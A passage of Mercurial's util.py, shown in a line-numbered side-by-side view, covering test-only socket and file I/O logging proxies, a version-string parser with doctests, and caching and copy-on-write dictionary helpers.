565 """
566 def _fillbuffer(self):
566 def _fillbuffer(self):
567 res = super(observedbufferedinputpipe, self)._fillbuffer()
567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568
568
569 fn = getattr(self._input._observer, r'osread', None)
569 fn = getattr(self._input._observer, r'osread', None)
570 if fn:
570 if fn:
571 fn(res, _chunksize)
571 fn(res, _chunksize)
572
572
573 return res
573 return res
574
574
575 # We use different observer methods because the operation isn't
575 # We use different observer methods because the operation isn't
576 # performed on the actual file object but on us.
576 # performed on the actual file object but on us.
577 def read(self, size):
577 def read(self, size):
578 res = super(observedbufferedinputpipe, self).read(size)
578 res = super(observedbufferedinputpipe, self).read(size)
579
579
580 fn = getattr(self._input._observer, r'bufferedread', None)
580 fn = getattr(self._input._observer, r'bufferedread', None)
581 if fn:
581 if fn:
582 fn(res, size)
582 fn(res, size)
583
583
584 return res
584 return res
585
585
586 def readline(self, *args, **kwargs):
586 def readline(self, *args, **kwargs):
587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588
588
589 fn = getattr(self._input._observer, r'bufferedreadline', None)
589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 if fn:
590 if fn:
591 fn(res)
591 fn(res)
592
592
593 return res
593 return res
594
594
595 PROXIED_SOCKET_METHODS = {
595 PROXIED_SOCKET_METHODS = {
596 r'makefile',
596 r'makefile',
597 r'recv',
597 r'recv',
598 r'recvfrom',
598 r'recvfrom',
599 r'recvfrom_into',
599 r'recvfrom_into',
600 r'recv_into',
600 r'recv_into',
601 r'send',
601 r'send',
602 r'sendall',
602 r'sendall',
603 r'sendto',
603 r'sendto',
604 r'setblocking',
604 r'setblocking',
605 r'settimeout',
605 r'settimeout',
606 r'gettimeout',
606 r'gettimeout',
607 r'setsockopt',
607 r'setsockopt',
608 }
608 }
609
609
610 class socketproxy(object):
610 class socketproxy(object):
611 """A proxy around a socket that tells a watcher when events occur.
611 """A proxy around a socket that tells a watcher when events occur.
612
612
613 This is like ``fileobjectproxy`` except for sockets.
613 This is like ``fileobjectproxy`` except for sockets.
614
614
615 This type is intended to only be used for testing purposes. Think hard
615 This type is intended to only be used for testing purposes. Think hard
616 before using it in important code.
616 before using it in important code.
617 """
617 """
618 __slots__ = (
618 __slots__ = (
619 r'_orig',
619 r'_orig',
620 r'_observer',
620 r'_observer',
621 )
621 )
622
622
623 def __init__(self, sock, observer):
623 def __init__(self, sock, observer):
624 object.__setattr__(self, r'_orig', sock)
624 object.__setattr__(self, r'_orig', sock)
625 object.__setattr__(self, r'_observer', observer)
625 object.__setattr__(self, r'_observer', observer)
626
626
627 def __getattribute__(self, name):
627 def __getattribute__(self, name):
628 if name in PROXIED_SOCKET_METHODS:
628 if name in PROXIED_SOCKET_METHODS:
629 return object.__getattribute__(self, name)
629 return object.__getattribute__(self, name)
630
630
631 return getattr(object.__getattribute__(self, r'_orig'), name)
631 return getattr(object.__getattribute__(self, r'_orig'), name)
632
632
633 def __delattr__(self, name):
633 def __delattr__(self, name):
634 return delattr(object.__getattribute__(self, r'_orig'), name)
634 return delattr(object.__getattribute__(self, r'_orig'), name)
635
635
636 def __setattr__(self, name, value):
636 def __setattr__(self, name, value):
637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638
638
639 def __nonzero__(self):
639 def __nonzero__(self):
640 return bool(object.__getattribute__(self, r'_orig'))
640 return bool(object.__getattribute__(self, r'_orig'))
641
641
642 __bool__ = __nonzero__
642 __bool__ = __nonzero__
643
643
644 def _observedcall(self, name, *args, **kwargs):
644 def _observedcall(self, name, *args, **kwargs):
645 # Call the original object.
645 # Call the original object.
646 orig = object.__getattribute__(self, r'_orig')
646 orig = object.__getattribute__(self, r'_orig')
647 res = getattr(orig, name)(*args, **kwargs)
647 res = getattr(orig, name)(*args, **kwargs)
648
648
649 # Call a method on the observer of the same name with arguments
649 # Call a method on the observer of the same name with arguments
650 # so it can react, log, etc.
650 # so it can react, log, etc.
651 observer = object.__getattribute__(self, r'_observer')
651 observer = object.__getattribute__(self, r'_observer')
652 fn = getattr(observer, name, None)
652 fn = getattr(observer, name, None)
653 if fn:
653 if fn:
654 fn(res, *args, **kwargs)
654 fn(res, *args, **kwargs)
655
655
656 return res
656 return res
657
657
658 def makefile(self, *args, **kwargs):
658 def makefile(self, *args, **kwargs):
659 res = object.__getattribute__(self, r'_observedcall')(
659 res = object.__getattribute__(self, r'_observedcall')(
660 r'makefile', *args, **kwargs)
660 r'makefile', *args, **kwargs)
661
661
662 # The file object may be used for I/O. So we turn it into a
662 # The file object may be used for I/O. So we turn it into a
663 # proxy using our observer.
663 # proxy using our observer.
664 observer = object.__getattribute__(self, r'_observer')
664 observer = object.__getattribute__(self, r'_observer')
665 return makeloggingfileobject(observer.fh, res, observer.name,
665 return makeloggingfileobject(observer.fh, res, observer.name,
666 reads=observer.reads,
666 reads=observer.reads,
667 writes=observer.writes,
667 writes=observer.writes,
668 logdata=observer.logdata,
668 logdata=observer.logdata,
669 logdataapis=observer.logdataapis)
669 logdataapis=observer.logdataapis)
670
670
671 def recv(self, *args, **kwargs):
671 def recv(self, *args, **kwargs):
672 return object.__getattribute__(self, r'_observedcall')(
672 return object.__getattribute__(self, r'_observedcall')(
673 r'recv', *args, **kwargs)
673 r'recv', *args, **kwargs)
674
674
675 def recvfrom(self, *args, **kwargs):
675 def recvfrom(self, *args, **kwargs):
676 return object.__getattribute__(self, r'_observedcall')(
676 return object.__getattribute__(self, r'_observedcall')(
677 r'recvfrom', *args, **kwargs)
677 r'recvfrom', *args, **kwargs)
678
678
679 def recvfrom_into(self, *args, **kwargs):
679 def recvfrom_into(self, *args, **kwargs):
680 return object.__getattribute__(self, r'_observedcall')(
680 return object.__getattribute__(self, r'_observedcall')(
681 r'recvfrom_into', *args, **kwargs)
681 r'recvfrom_into', *args, **kwargs)
682
682
683 def recv_into(self, *args, **kwargs):
683 def recv_into(self, *args, **kwargs):
684 return object.__getattribute__(self, r'_observedcall')(
684 return object.__getattribute__(self, r'_observedcall')(
685 r'recv_info', *args, **kwargs)
685 r'recv_info', *args, **kwargs)
686
686
687 def send(self, *args, **kwargs):
687 def send(self, *args, **kwargs):
688 return object.__getattribute__(self, r'_observedcall')(
688 return object.__getattribute__(self, r'_observedcall')(
689 r'send', *args, **kwargs)
689 r'send', *args, **kwargs)
690
690
691 def sendall(self, *args, **kwargs):
691 def sendall(self, *args, **kwargs):
692 return object.__getattribute__(self, r'_observedcall')(
692 return object.__getattribute__(self, r'_observedcall')(
693 r'sendall', *args, **kwargs)
693 r'sendall', *args, **kwargs)
694
694
695 def sendto(self, *args, **kwargs):
695 def sendto(self, *args, **kwargs):
696 return object.__getattribute__(self, r'_observedcall')(
696 return object.__getattribute__(self, r'_observedcall')(
697 r'sendto', *args, **kwargs)
697 r'sendto', *args, **kwargs)
698
698
699 def setblocking(self, *args, **kwargs):
699 def setblocking(self, *args, **kwargs):
700 return object.__getattribute__(self, r'_observedcall')(
700 return object.__getattribute__(self, r'_observedcall')(
701 r'setblocking', *args, **kwargs)
701 r'setblocking', *args, **kwargs)
702
702
703 def settimeout(self, *args, **kwargs):
703 def settimeout(self, *args, **kwargs):
704 return object.__getattribute__(self, r'_observedcall')(
704 return object.__getattribute__(self, r'_observedcall')(
705 r'settimeout', *args, **kwargs)
705 r'settimeout', *args, **kwargs)
706
706
707 def gettimeout(self, *args, **kwargs):
707 def gettimeout(self, *args, **kwargs):
708 return object.__getattribute__(self, r'_observedcall')(
708 return object.__getattribute__(self, r'_observedcall')(
709 r'gettimeout', *args, **kwargs)
709 r'gettimeout', *args, **kwargs)
710
710
711 def setsockopt(self, *args, **kwargs):
711 def setsockopt(self, *args, **kwargs):
712 return object.__getattribute__(self, r'_observedcall')(
712 return object.__getattribute__(self, r'_observedcall')(
713 r'setsockopt', *args, **kwargs)
713 r'setsockopt', *args, **kwargs)
714
714
715 class baseproxyobserver(object):
715 class baseproxyobserver(object):
716 def _writedata(self, data):
716 def _writedata(self, data):
717 if not self.logdata:
717 if not self.logdata:
718 if self.logdataapis:
718 if self.logdataapis:
719 self.fh.write('\n')
719 self.fh.write('\n')
720 self.fh.flush()
720 self.fh.flush()
721 return
721 return
722
722
723 # Simple case writes all data on a single line.
723 # Simple case writes all data on a single line.
724 if b'\n' not in data:
724 if b'\n' not in data:
725 if self.logdataapis:
725 if self.logdataapis:
726 self.fh.write(': %s\n' % stringutil.escapestr(data))
726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 else:
727 else:
728 self.fh.write('%s> %s\n'
728 self.fh.write('%s> %s\n'
729 % (self.name, stringutil.escapestr(data)))
729 % (self.name, stringutil.escapestr(data)))
730 self.fh.flush()
730 self.fh.flush()
731 return
731 return
732
732
733 # Data with newlines is written to multiple lines.
733 # Data with newlines is written to multiple lines.
734 if self.logdataapis:
734 if self.logdataapis:
735 self.fh.write(':\n')
735 self.fh.write(':\n')
736
736
737 lines = data.splitlines(True)
737 lines = data.splitlines(True)
738 for line in lines:
738 for line in lines:
739 self.fh.write('%s> %s\n'
739 self.fh.write('%s> %s\n'
740 % (self.name, stringutil.escapestr(line)))
740 % (self.name, stringutil.escapestr(line)))
741 self.fh.flush()
741 self.fh.flush()
742
742
743 class fileobjectobserver(baseproxyobserver):
743 class fileobjectobserver(baseproxyobserver):
744 """Logs file object activity."""
744 """Logs file object activity."""
745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 logdataapis=True):
746 logdataapis=True):
747 self.fh = fh
747 self.fh = fh
748 self.name = name
748 self.name = name
749 self.logdata = logdata
749 self.logdata = logdata
750 self.logdataapis = logdataapis
750 self.logdataapis = logdataapis
751 self.reads = reads
751 self.reads = reads
752 self.writes = writes
752 self.writes = writes
753
753
754 def read(self, res, size=-1):
754 def read(self, res, size=-1):
755 if not self.reads:
755 if not self.reads:
756 return
756 return
757 # Python 3 can return None from reads at EOF instead of empty strings.
757 # Python 3 can return None from reads at EOF instead of empty strings.
758 if res is None:
758 if res is None:
759 res = ''
759 res = ''
760
760
761 if size == -1 and res == '':
761 if size == -1 and res == '':
762 # Suppress pointless read(-1) calls that return
762 # Suppress pointless read(-1) calls that return
763 # nothing. These happen _a lot_ on Python 3, and there
763 # nothing. These happen _a lot_ on Python 3, and there
764 # doesn't seem to be a better workaround to have matching
764 # doesn't seem to be a better workaround to have matching
765 # Python 2 and 3 behavior. :(
765 # Python 2 and 3 behavior. :(
766 return
766 return
767
767
768 if self.logdataapis:
768 if self.logdataapis:
769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770
770
771 self._writedata(res)
771 self._writedata(res)
772
772
773 def readline(self, res, limit=-1):
773 def readline(self, res, limit=-1):
774 if not self.reads:
774 if not self.reads:
775 return
775 return
776
776
777 if self.logdataapis:
777 if self.logdataapis:
778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779
779
780 self._writedata(res)
780 self._writedata(res)
781
781
782 def readinto(self, res, dest):
782 def readinto(self, res, dest):
783 if not self.reads:
783 if not self.reads:
784 return
784 return
785
785
786 if self.logdataapis:
786 if self.logdataapis:
787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 res))
788 res))
789
789
790 data = dest[0:res] if res is not None else b''
790 data = dest[0:res] if res is not None else b''
791 self._writedata(data)
791 self._writedata(data)
792
792
793 def write(self, res, data):
793 def write(self, res, data):
794 if not self.writes:
794 if not self.writes:
795 return
795 return
796
796
797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 # returns the integer bytes written.
798 # returns the integer bytes written.
799 if res is None and data:
799 if res is None and data:
800 res = len(data)
800 res = len(data)
801
801
802 if self.logdataapis:
802 if self.logdataapis:
803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804
804
805 self._writedata(data)
805 self._writedata(data)
806
806
807 def flush(self, res):
807 def flush(self, res):
808 if not self.writes:
808 if not self.writes:
809 return
809 return
810
810
811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812
812
813 # For observedbufferedinputpipe.
813 # For observedbufferedinputpipe.
814 def bufferedread(self, res, size):
814 def bufferedread(self, res, size):
815 if not self.reads:
815 if not self.reads:
816 return
816 return
817
817
818 if self.logdataapis:
818 if self.logdataapis:
819 self.fh.write('%s> bufferedread(%d) -> %d' % (
819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 self.name, size, len(res)))
820 self.name, size, len(res)))
821
821
822 self._writedata(res)
822 self._writedata(res)
823
823
824 def bufferedreadline(self, res):
824 def bufferedreadline(self, res):
825 if not self.reads:
825 if not self.reads:
826 return
826 return
827
827
828 if self.logdataapis:
828 if self.logdataapis:
829 self.fh.write('%s> bufferedreadline() -> %d' % (
829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 self.name, len(res)))
830 self.name, len(res)))
831
831
832 self._writedata(res)
832 self._writedata(res)
833
833
834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 logdata=False, logdataapis=True):
835 logdata=False, logdataapis=True):
836 """Turn a file object into a logging file object."""
836 """Turn a file object into a logging file object."""
837
837
838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 logdata=logdata, logdataapis=logdataapis)
839 logdata=logdata, logdataapis=logdataapis)
840 return fileobjectproxy(fh, observer)
840 return fileobjectproxy(fh, observer)
841
841
842 class socketobserver(baseproxyobserver):
842 class socketobserver(baseproxyobserver):
843 """Logs socket activity."""
843 """Logs socket activity."""
844 def __init__(self, fh, name, reads=True, writes=True, states=True,
844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 logdata=False, logdataapis=True):
845 logdata=False, logdataapis=True):
846 self.fh = fh
846 self.fh = fh
847 self.name = name
847 self.name = name
848 self.reads = reads
848 self.reads = reads
849 self.writes = writes
849 self.writes = writes
850 self.states = states
850 self.states = states
851 self.logdata = logdata
851 self.logdata = logdata
852 self.logdataapis = logdataapis
852 self.logdataapis = logdataapis
853
853
854 def makefile(self, res, mode=None, bufsize=None):
854 def makefile(self, res, mode=None, bufsize=None):
855 if not self.states:
855 if not self.states:
856 return
856 return
857
857
858 self.fh.write('%s> makefile(%r, %r)\n' % (
858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 self.name, mode, bufsize))
859 self.name, mode, bufsize))
860
860
861 def recv(self, res, size, flags=0):
861 def recv(self, res, size, flags=0):
862 if not self.reads:
862 if not self.reads:
863 return
863 return
864
864
865 if self.logdataapis:
865 if self.logdataapis:
866 self.fh.write('%s> recv(%d, %d) -> %d' % (
866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 self.name, size, flags, len(res)))
867 self.name, size, flags, len(res)))
868 self._writedata(res)
868 self._writedata(res)
869
869
870 def recvfrom(self, res, size, flags=0):
870 def recvfrom(self, res, size, flags=0):
871 if not self.reads:
871 if not self.reads:
872 return
872 return
873
873
874 if self.logdataapis:
874 if self.logdataapis:
875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 self.name, size, flags, len(res[0])))
876 self.name, size, flags, len(res[0])))
877
877
878 self._writedata(res[0])
878 self._writedata(res[0])
879
879
880 def recvfrom_into(self, res, buf, size, flags=0):
880 def recvfrom_into(self, res, buf, size, flags=0):
881 if not self.reads:
881 if not self.reads:
882 return
882 return
883
883
884 if self.logdataapis:
884 if self.logdataapis:
885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 self.name, size, flags, res[0]))
886 self.name, size, flags, res[0]))
887
887
888 self._writedata(buf[0:res[0]])
888 self._writedata(buf[0:res[0]])
889
889
890 def recv_into(self, res, buf, size=0, flags=0):
890 def recv_into(self, res, buf, size=0, flags=0):
891 if not self.reads:
891 if not self.reads:
892 return
892 return
893
893
894 if self.logdataapis:
894 if self.logdataapis:
895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 self.name, size, flags, res))
896 self.name, size, flags, res))
897
897
898 self._writedata(buf[0:res])
898 self._writedata(buf[0:res])
899
899
900 def send(self, res, data, flags=0):
900 def send(self, res, data, flags=0):
901 if not self.writes:
901 if not self.writes:
902 return
902 return
903
903
904 self.fh.write('%s> send(%d, %d) -> %d' % (
904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 self.name, len(data), flags, len(res)))
905 self.name, len(data), flags, len(res)))
906 self._writedata(data)
906 self._writedata(data)
907
907
908 def sendall(self, res, data, flags=0):
908 def sendall(self, res, data, flags=0):
909 if not self.writes:
909 if not self.writes:
910 return
910 return
911
911
912 if self.logdataapis:
912 if self.logdataapis:
913 # Returns None on success. So don't bother reporting return value.
913 # Returns None on success. So don't bother reporting return value.
914 self.fh.write('%s> sendall(%d, %d)' % (
914 self.fh.write('%s> sendall(%d, %d)' % (
915 self.name, len(data), flags))
915 self.name, len(data), flags))
916
916
917 self._writedata(data)
917 self._writedata(data)
918
918
919 def sendto(self, res, data, flagsoraddress, address=None):
919 def sendto(self, res, data, flagsoraddress, address=None):
920 if not self.writes:
920 if not self.writes:
921 return
921 return
922
922
923 if address:
923 if address:
924 flags = flagsoraddress
924 flags = flagsoraddress
925 else:
925 else:
926 flags = 0
926 flags = 0
927
927
928 if self.logdataapis:
928 if self.logdataapis:
929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 self.name, len(data), flags, address, res))
930 self.name, len(data), flags, address, res))
931
931
932 self._writedata(data)
932 self._writedata(data)
933
933
934 def setblocking(self, res, flag):
934 def setblocking(self, res, flag):
935 if not self.states:
935 if not self.states:
936 return
936 return
937
937
938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939
939
940 def settimeout(self, res, value):
940 def settimeout(self, res, value):
941 if not self.states:
941 if not self.states:
942 return
942 return
943
943
944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945
945
946 def gettimeout(self, res):
946 def gettimeout(self, res):
947 if not self.states:
947 if not self.states:
948 return
948 return
949
949
950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951
951
952 def setsockopt(self, res, level, optname, value):
952 def setsockopt(self, res, level, optname, value):
953 if not self.states:
953 if not self.states:
954 return
954 return
955
955
956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 self.name, level, optname, value, res))
957 self.name, level, optname, value, res))
958
958
959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 logdata=False, logdataapis=True):
960 logdata=False, logdataapis=True):
961 """Turn a socket into a logging socket."""
961 """Turn a socket into a logging socket."""
962
962
963 observer = socketobserver(logh, name, reads=reads, writes=writes,
963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 states=states, logdata=logdata,
964 states=states, logdata=logdata,
965 logdataapis=logdataapis)
965 logdataapis=logdataapis)
966 return socketproxy(fh, observer)
966 return socketproxy(fh, observer)
967
967
968 def version():
968 def version():
969 """Return version information if available."""
969 """Return version information if available."""
970 try:
970 try:
971 from . import __version__
971 from . import __version__
972 return __version__.version
972 return __version__.version
973 except ImportError:
973 except ImportError:
974 return 'unknown'
974 return 'unknown'
975
975
976 def versiontuple(v=None, n=4):
976 def versiontuple(v=None, n=4):
977 """Parses a Mercurial version string into an N-tuple.
977 """Parses a Mercurial version string into an N-tuple.
978
978
979 The version string to be parsed is specified with the ``v`` argument.
979 The version string to be parsed is specified with the ``v`` argument.
980 If it isn't defined, the current Mercurial version string will be parsed.
980 If it isn't defined, the current Mercurial version string will be parsed.
981
981
982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 returned values:
983 returned values:
984
984
985 >>> v = b'3.6.1+190-df9b73d2d444'
985 >>> v = b'3.6.1+190-df9b73d2d444'
986 >>> versiontuple(v, 2)
986 >>> versiontuple(v, 2)
987 (3, 6)
987 (3, 6)
988 >>> versiontuple(v, 3)
988 >>> versiontuple(v, 3)
989 (3, 6, 1)
989 (3, 6, 1)
990 >>> versiontuple(v, 4)
990 >>> versiontuple(v, 4)
991 (3, 6, 1, '190-df9b73d2d444')
991 (3, 6, 1, '190-df9b73d2d444')
992
992
993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 (3, 6, 1, '190-df9b73d2d444+20151118')
994 (3, 6, 1, '190-df9b73d2d444+20151118')
995
995
996 >>> v = b'3.6'
996 >>> v = b'3.6'
997 >>> versiontuple(v, 2)
997 >>> versiontuple(v, 2)
998 (3, 6)
998 (3, 6)
999 >>> versiontuple(v, 3)
999 >>> versiontuple(v, 3)
1000 (3, 6, None)
1000 (3, 6, None)
1001 >>> versiontuple(v, 4)
1001 >>> versiontuple(v, 4)
1002 (3, 6, None, None)
1002 (3, 6, None, None)
1003
1003
1004 >>> v = b'3.9-rc'
1004 >>> v = b'3.9-rc'
1005 >>> versiontuple(v, 2)
1005 >>> versiontuple(v, 2)
1006 (3, 9)
1006 (3, 9)
1007 >>> versiontuple(v, 3)
1007 >>> versiontuple(v, 3)
1008 (3, 9, None)
1008 (3, 9, None)
1009 >>> versiontuple(v, 4)
1009 >>> versiontuple(v, 4)
1010 (3, 9, None, 'rc')
1010 (3, 9, None, 'rc')
1011
1011
1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 >>> versiontuple(v, 2)
1013 >>> versiontuple(v, 2)
1014 (3, 9)
1014 (3, 9)
1015 >>> versiontuple(v, 3)
1015 >>> versiontuple(v, 3)
1016 (3, 9, None)
1016 (3, 9, None)
1017 >>> versiontuple(v, 4)
1017 >>> versiontuple(v, 4)
1018 (3, 9, None, 'rc+2-02a8fea4289b')
1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019
1019
1020 >>> versiontuple(b'4.6rc0')
1020 >>> versiontuple(b'4.6rc0')
1021 (4, 6, None, 'rc0')
1021 (4, 6, None, 'rc0')
1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 (4, 6, None, 'rc0+12-425d55e54f98')
1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 >>> versiontuple(b'.1.2.3')
1024 >>> versiontuple(b'.1.2.3')
1025 (None, None, None, '.1.2.3')
1025 (None, None, None, '.1.2.3')
1026 >>> versiontuple(b'12.34..5')
1026 >>> versiontuple(b'12.34..5')
1027 (12, 34, None, '..5')
1027 (12, 34, None, '..5')
1028 >>> versiontuple(b'1.2.3.4.5.6')
1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 (1, 2, 3, '.4.5.6')
1029 (1, 2, 3, '.4.5.6')
1030 """
1030 """
1031 if not v:
1031 if not v:
1032 v = version()
1032 v = version()
1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 if not m:
1034 if not m:
1035 vparts, extra = '', v
1035 vparts, extra = '', v
1036 elif m.group(2):
1036 elif m.group(2):
1037 vparts, extra = m.groups()
1037 vparts, extra = m.groups()
1038 else:
1038 else:
1039 vparts, extra = m.group(1), None
1039 vparts, extra = m.group(1), None
1040
1040
1041 vints = []
1041 vints = []
1042 for i in vparts.split('.'):
1042 for i in vparts.split('.'):
1043 try:
1043 try:
1044 vints.append(int(i))
1044 vints.append(int(i))
1045 except ValueError:
1045 except ValueError:
1046 break
1046 break
1047 # (3, 6) -> (3, 6, None)
1047 # (3, 6) -> (3, 6, None)
1048 while len(vints) < 3:
1048 while len(vints) < 3:
1049 vints.append(None)
1049 vints.append(None)
1050
1050
1051 if n == 2:
1051 if n == 2:
1052 return (vints[0], vints[1])
1052 return (vints[0], vints[1])
1053 if n == 3:
1053 if n == 3:
1054 return (vints[0], vints[1], vints[2])
1054 return (vints[0], vints[1], vints[2])
1055 if n == 4:
1055 if n == 4:
1056 return (vints[0], vints[1], vints[2], extra)
1056 return (vints[0], vints[1], vints[2], extra)
1057
1057
1058 def cachefunc(func):
1058 def cachefunc(func):
1059 '''cache the result of function calls'''
1059 '''cache the result of function calls'''
1060 # XXX doesn't handle keywords args
1060 # XXX doesn't handle keywords args
1061 if func.__code__.co_argcount == 0:
1061 if func.__code__.co_argcount == 0:
1062 cache = []
1062 cache = []
1063 def f():
1063 def f():
1064 if len(cache) == 0:
1064 if len(cache) == 0:
1065 cache.append(func())
1065 cache.append(func())
1066 return cache[0]
1066 return cache[0]
1067 return f
1067 return f
1068 cache = {}
1068 cache = {}
1069 if func.__code__.co_argcount == 1:
1069 if func.__code__.co_argcount == 1:
1070 # we gain a small amount of time because
1070 # we gain a small amount of time because
1071 # we don't need to pack/unpack the list
1071 # we don't need to pack/unpack the list
1072 def f(arg):
1072 def f(arg):
1073 if arg not in cache:
1073 if arg not in cache:
1074 cache[arg] = func(arg)
1074 cache[arg] = func(arg)
1075 return cache[arg]
1075 return cache[arg]
1076 else:
1076 else:
1077 def f(*args):
1077 def f(*args):
1078 if args not in cache:
1078 if args not in cache:
1079 cache[args] = func(*args)
1079 cache[args] = func(*args)
1080 return cache[args]
1080 return cache[args]
1081
1081
1082 return f
1082 return f
1083
1083
1084 class cow(object):
1084 class cow(object):
1085 """helper class to make copy-on-write easier
1085 """helper class to make copy-on-write easier
1086
1086
1087 Call preparewrite before doing any writes.
1087 Call preparewrite before doing any writes.
1088 """
1088 """
1089
1089
1090 def preparewrite(self):
1090 def preparewrite(self):
1091 """call this before writes, return self or a copied new object"""
1091 """call this before writes, return self or a copied new object"""
1092 if getattr(self, '_copied', 0):
1092 if getattr(self, '_copied', 0):
1093 self._copied -= 1
1093 self._copied -= 1
1094 return self.__class__(self)
1094 return self.__class__(self)
1095 return self
1095 return self
1096
1096
1097 def copy(self):
1097 def copy(self):
1098 """always do a cheap copy"""
1098 """always do a cheap copy"""
1099 self._copied = getattr(self, '_copied', 0) + 1
1099 self._copied = getattr(self, '_copied', 0) + 1
1100 return self
1100 return self
1101
1101
1102 class sortdict(collections.OrderedDict):
1102 class sortdict(collections.OrderedDict):
1103 '''a simple sorted dictionary
1103 '''a simple sorted dictionary
1104
1104
1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 >>> d2 = d1.copy()
1106 >>> d2 = d1.copy()
1107 >>> d2
1107 >>> d2
1108 sortdict([('a', 0), ('b', 1)])
1108 sortdict([('a', 0), ('b', 1)])
1109 >>> d2.update([(b'a', 2)])
1109 >>> d2.update([(b'a', 2)])
1110 >>> list(d2.keys()) # should still be in last-set order
1110 >>> list(d2.keys()) # should still be in last-set order
1111 ['b', 'a']
1111 ['b', 'a']
1112 '''
1112 '''
1113
1113
1114 def __setitem__(self, key, value):
1114 def __setitem__(self, key, value):
1115 if key in self:
1115 if key in self:
1116 del self[key]
1116 del self[key]
1117 super(sortdict, self).__setitem__(key, value)
1117 super(sortdict, self).__setitem__(key, value)
1118
1118
1119 if pycompat.ispypy:
1119 if pycompat.ispypy:
1120 # __setitem__() isn't called as of PyPy 5.8.0
1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 def update(self, src):
1121 def update(self, src):
1122 if isinstance(src, dict):
1122 if isinstance(src, dict):
1123 src = src.iteritems()
1123 src = src.iteritems()
1124 for k, v in src:
1124 for k, v in src:
1125 self[k] = v
1125 self[k] = v
1126
1126
1127 class cowdict(cow, dict):
1127 class cowdict(cow, dict):
1128 """copy-on-write dict
1128 """copy-on-write dict
1129
1129
1130 Be sure to call d = d.preparewrite() before writing to d.
1130 Be sure to call d = d.preparewrite() before writing to d.
1131
1131
1132 >>> a = cowdict()
1132 >>> a = cowdict()
1133 >>> a is a.preparewrite()
1133 >>> a is a.preparewrite()
1134 True
1134 True
1135 >>> b = a.copy()
1135 >>> b = a.copy()
1136 >>> b is a
1136 >>> b is a
1137 True
1137 True
1138 >>> c = b.copy()
1138 >>> c = b.copy()
1139 >>> c is a
1139 >>> c is a
1140 True
1140 True
1141 >>> a = a.preparewrite()
1141 >>> a = a.preparewrite()
1142 >>> b is a
1142 >>> b is a
1143 False
1143 False
1144 >>> a is a.preparewrite()
1144 >>> a is a.preparewrite()
1145 True
1145 True
1146 >>> c = c.preparewrite()
1146 >>> c = c.preparewrite()
1147 >>> b is c
1147 >>> b is c
1148 False
1148 False
1149 >>> b is b.preparewrite()
1149 >>> b is b.preparewrite()
1150 True
1150 True
1151 """
1151 """
1152
1152
1153 class cowsortdict(cow, sortdict):
1153 class cowsortdict(cow, sortdict):
